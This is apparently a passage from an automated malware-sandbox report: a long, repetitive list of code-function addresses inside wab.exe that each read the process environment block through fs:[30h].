Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]	26_2_21CA51EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]	26_2_21CA51EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]	26_2_21CA51EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]	26_2_21CA51EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C851ED mov eax, dword ptr fs:[00000030h]	26_2_21C851ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D271F9 mov esi, dword ptr fs:[00000030h]	26_2_21D271F9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D561E5 mov eax, dword ptr fs:[00000030h]	26_2_21D561E5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB01F8 mov eax, dword ptr fs:[00000030h]	26_2_21CB01F8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC0185 mov eax, dword ptr fs:[00000030h]	26_2_21CC0185
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0019F mov eax, dword ptr fs:[00000030h]	26_2_21D0019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0019F mov eax, dword ptr fs:[00000030h]	26_2_21D0019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0019F mov eax, dword ptr fs:[00000030h]	26_2_21D0019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0019F mov eax, dword ptr fs:[00000030h]	26_2_21D0019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7A197 mov eax, dword ptr fs:[00000030h]	26_2_21C7A197
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7A197 mov eax, dword ptr fs:[00000030h]	26_2_21C7A197
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7A197 mov eax, dword ptr fs:[00000030h]	26_2_21C7A197
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D3C188 mov eax, dword ptr fs:[00000030h]	26_2_21D3C188
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D3C188 mov eax, dword ptr fs:[00000030h]	26_2_21D3C188
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CD7190 mov eax, dword ptr fs:[00000030h]	26_2_21CD7190
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D311A4 mov eax, dword ptr fs:[00000030h]	26_2_21D311A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D311A4 mov eax, dword ptr fs:[00000030h]	26_2_21D311A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D311A4 mov eax, dword ptr fs:[00000030h]	26_2_21D311A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D311A4 mov eax, dword ptr fs:[00000030h]	26_2_21D311A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9B1B0 mov eax, dword ptr fs:[00000030h]	26_2_21C9B1B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D55152 mov eax, dword ptr fs:[00000030h]	26_2_21D55152
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D18158 mov eax, dword ptr fs:[00000030h]	26_2_21D18158
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C79148 mov eax, dword ptr fs:[00000030h]	26_2_21C79148
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C79148 mov eax, dword ptr fs:[00000030h]	26_2_21C79148
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C79148 mov eax, dword ptr fs:[00000030h]	26_2_21C79148
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C79148 mov eax, dword ptr fs:[00000030h]	26_2_21C79148
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7C156 mov eax, dword ptr fs:[00000030h]	26_2_21C7C156
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C87152 mov eax, dword ptr fs:[00000030h]	26_2_21C87152
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C86154 mov eax, dword ptr fs:[00000030h]	26_2_21C86154
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C86154 mov eax, dword ptr fs:[00000030h]	26_2_21C86154
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D19179 mov eax, dword ptr fs:[00000030h]	26_2_21D19179
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D40115 mov eax, dword ptr fs:[00000030h]	26_2_21D40115
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D2A118 mov ecx, dword ptr fs:[00000030h]	26_2_21D2A118
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D2A118 mov eax, dword ptr fs:[00000030h]	26_2_21D2A118
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D2A118 mov eax, dword ptr fs:[00000030h]	26_2_21D2A118
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D2A118 mov eax, dword ptr fs:[00000030h]	26_2_21D2A118
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB0124 mov eax, dword ptr fs:[00000030h]	26_2_21CB0124
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7B136 mov eax, dword ptr fs:[00000030h]	26_2_21C7B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7B136 mov eax, dword ptr fs:[00000030h]	26_2_21C7B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7B136 mov eax, dword ptr fs:[00000030h]	26_2_21C7B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7B136 mov eax, dword ptr fs:[00000030h]	26_2_21C7B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0 mov ecx, dword ptr fs:[00000030h]	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0 mov ecx, dword ptr fs:[00000030h]	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0 mov ecx, dword ptr fs:[00000030h]	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0 mov ecx, dword ptr fs:[00000030h]	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D550D9 mov eax, dword ptr fs:[00000030h]	26_2_21D550D9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D020DE mov eax, dword ptr fs:[00000030h]	26_2_21D020DE
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CFD0C0 mov eax, dword ptr fs:[00000030h]	26_2_21CFD0C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CFD0C0 mov eax, dword ptr fs:[00000030h]	26_2_21CFD0C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA90DB mov eax, dword ptr fs:[00000030h]	26_2_21CA90DB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C880E9 mov eax, dword ptr fs:[00000030h]	26_2_21C880E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7A0E3 mov ecx, dword ptr fs:[00000030h]	26_2_21C7A0E3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA50E4 mov eax, dword ptr fs:[00000030h]	26_2_21CA50E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA50E4 mov ecx, dword ptr fs:[00000030h]	26_2_21CA50E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D060E0 mov eax, dword ptr fs:[00000030h]	26_2_21D060E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7C0F0 mov eax, dword ptr fs:[00000030h]	26_2_21C7C0F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC20F0 mov ecx, dword ptr fs:[00000030h]	26_2_21CC20F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8208A mov eax, dword ptr fs:[00000030h]	26_2_21C8208A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7D08D mov eax, dword ptr fs:[00000030h]	26_2_21C7D08D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0D080 mov eax, dword ptr fs:[00000030h]	26_2_21D0D080
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0D080 mov eax, dword ptr fs:[00000030h]	26_2_21D0D080
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB909C mov eax, dword ptr fs:[00000030h]	26_2_21CB909C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAD090 mov eax, dword ptr fs:[00000030h]	26_2_21CAD090
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAD090 mov eax, dword ptr fs:[00000030h]	26_2_21CAD090
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C85096 mov eax, dword ptr fs:[00000030h]	26_2_21C85096
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D460B8 mov eax, dword ptr fs:[00000030h]	26_2_21D460B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D460B8 mov ecx, dword ptr fs:[00000030h]	26_2_21D460B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D180A8 mov eax, dword ptr fs:[00000030h]	26_2_21D180A8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D06050 mov eax, dword ptr fs:[00000030h]	26_2_21D06050
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C82050 mov eax, dword ptr fs:[00000030h]	26_2_21C82050
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAB052 mov eax, dword ptr fs:[00000030h]	26_2_21CAB052
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D55060 mov eax, dword ptr fs:[00000030h]	26_2_21D55060
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAC073 mov eax, dword ptr fs:[00000030h]	26_2_21CAC073
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0106E mov eax, dword ptr fs:[00000030h]	26_2_21D0106E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CFD070 mov ecx, dword ptr fs:[00000030h]	26_2_21CFD070
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9E016 mov eax, dword ptr fs:[00000030h]	26_2_21C9E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9E016 mov eax, dword ptr fs:[00000030h]	26_2_21C9E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9E016 mov eax, dword ptr fs:[00000030h]	26_2_21C9E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9E016 mov eax, dword ptr fs:[00000030h]	26_2_21C9E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7A020 mov eax, dword ptr fs:[00000030h]	26_2_21C7A020
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7C020 mov eax, dword ptr fs:[00000030h]	26_2_21C7C020
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D4903E mov eax, dword ptr fs:[00000030h]	26_2_21D4903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D4903E mov eax, dword ptr fs:[00000030h]	26_2_21D4903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D4903E mov eax, dword ptr fs:[00000030h]	26_2_21D4903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D4903E mov eax, dword ptr fs:[00000030h]	26_2_21D4903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D3B3D0 mov ecx, dword ptr fs:[00000030h]	26_2_21D3B3D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8A3C0 mov eax, dword ptr fs:[00000030h]	26_2_21C8A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8A3C0 mov eax, dword ptr fs:[00000030h]	26_2_21C8A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8A3C0 mov eax, dword ptr fs:[00000030h]	26_2_21C8A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8A3C0 mov eax, dword ptr fs:[00000030h]	26_2_21C8A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8A3C0 mov eax, dword ptr fs:[00000030h]	26_2_21C8A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8A3C0 mov eax, dword ptr fs:[00000030h]	26_2_21C8A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C883C0 mov eax, dword ptr fs:[00000030h]	26_2_21C883C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C883C0 mov eax, dword ptr fs:[00000030h]	26_2_21C883C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C883C0 mov eax, dword ptr fs:[00000030h]	26_2_21C883C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C883C0 mov eax, dword ptr fs:[00000030h]	26_2_21C883C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D063C0 mov eax, dword ptr fs:[00000030h]	26_2_21D063C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D3C3CD mov eax, dword ptr fs:[00000030h]	26_2_21D3C3CD
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C903E9 mov eax, dword ptr fs:[00000030h]	26_2_21C903E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C903E9 mov eax, dword ptr fs:[00000030h]	26_2_21C903E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C903E9 mov eax, dword ptr fs:[00000030h]	26_2_21C903E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C903E9 mov eax, dword ptr fs:[00000030h]	26_2_21C903E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C903E9 mov eax, dword ptr fs:[00000030h]	26_2_21C903E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C903E9 mov eax, dword ptr fs:[00000030h]	26_2_21C903E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C903E9 mov eax, dword ptr fs:[00000030h]	26_2_21C903E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C903E9 mov eax, dword ptr fs:[00000030h]	26_2_21C903E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D553FC mov eax, dword ptr fs:[00000030h]	26_2_21D553FC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB63FF mov eax, dword ptr fs:[00000030h]	26_2_21CB63FF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9E3F0 mov eax, dword ptr fs:[00000030h]	26_2_21C9E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9E3F0 mov eax, dword ptr fs:[00000030h]	26_2_21C9E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9E3F0 mov eax, dword ptr fs:[00000030h]	26_2_21C9E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA438F mov eax, dword ptr fs:[00000030h]	26_2_21CA438F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA438F mov eax, dword ptr fs:[00000030h]	26_2_21CA438F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7E388 mov eax, dword ptr fs:[00000030h]	26_2_21C7E388
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7E388 mov eax, dword ptr fs:[00000030h]	26_2_21C7E388
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7E388 mov eax, dword ptr fs:[00000030h]	26_2_21C7E388
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C78397 mov eax, dword ptr fs:[00000030h]	26_2_21C78397
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C78397 mov eax, dword ptr fs:[00000030h]	26_2_21C78397
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C78397 mov eax, dword ptr fs:[00000030h]	26_2_21C78397
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CD739A mov eax, dword ptr fs:[00000030h]	26_2_21CD739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CD739A mov eax, dword ptr fs:[00000030h]	26_2_21CD739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB33A0 mov eax, dword ptr fs:[00000030h]	26_2_21CB33A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB33A0 mov eax, dword ptr fs:[00000030h]	26_2_21CB33A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA33A5 mov eax, dword ptr fs:[00000030h]	26_2_21CA33A5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7D34C mov eax, dword ptr fs:[00000030h]	26_2_21C7D34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7D34C mov eax, dword ptr fs:[00000030h]	26_2_21C7D34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0035C mov eax, dword ptr fs:[00000030h]	26_2_21D0035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0035C mov eax, dword ptr fs:[00000030h]	26_2_21D0035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0035C mov eax, dword ptr fs:[00000030h]	26_2_21D0035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0035C mov ecx, dword ptr fs:[00000030h]	26_2_21D0035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0035C mov eax, dword ptr fs:[00000030h]	26_2_21D0035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0035C mov eax, dword ptr fs:[00000030h]	26_2_21D0035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C79353 mov eax, dword ptr fs:[00000030h]	26_2_21C79353
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C79353 mov eax, dword ptr fs:[00000030h]	26_2_21C79353
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D55341 mov eax, dword ptr fs:[00000030h]	26_2_21D55341
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]	26_2_21D02349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]	26_2_21D02349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]	26_2_21D02349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]	26_2_21D02349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]	26_2_21D02349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]	26_2_21D02349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]	26_2_21D02349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]	26_2_21D02349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]	26_2_21D02349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]	26_2_21D02349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]	26_2_21D02349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]	26_2_21D02349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]	26_2_21D02349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]	26_2_21D02349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]	26_2_21D02349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D2437C mov eax, dword ptr fs:[00000030h]	26_2_21D2437C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D3F367 mov eax, dword ptr fs:[00000030h]	26_2_21D3F367
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C87370 mov eax, dword ptr fs:[00000030h]	26_2_21C87370
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C87370 mov eax, dword ptr fs:[00000030h]	26_2_21C87370
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C87370 mov eax, dword ptr fs:[00000030h]	26_2_21C87370
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBA30B mov eax, dword ptr fs:[00000030h]	26_2_21CBA30B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBA30B mov eax, dword ptr fs:[00000030h]	26_2_21CBA30B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBA30B mov eax, dword ptr fs:[00000030h]	26_2_21CBA30B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7C310 mov ecx, dword ptr fs:[00000030h]	26_2_21C7C310
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA0310 mov ecx, dword ptr fs:[00000030h]	26_2_21CA0310
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0930B mov eax, dword ptr fs:[00000030h]	26_2_21D0930B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0930B mov eax, dword ptr fs:[00000030h]	26_2_21D0930B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0930B mov eax, dword ptr fs:[00000030h]	26_2_21D0930B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAF32A mov eax, dword ptr fs:[00000030h]	26_2_21CAF32A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C77330 mov eax, dword ptr fs:[00000030h]	26_2_21C77330
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D4132D mov eax, dword ptr fs:[00000030h]	26_2_21D4132D
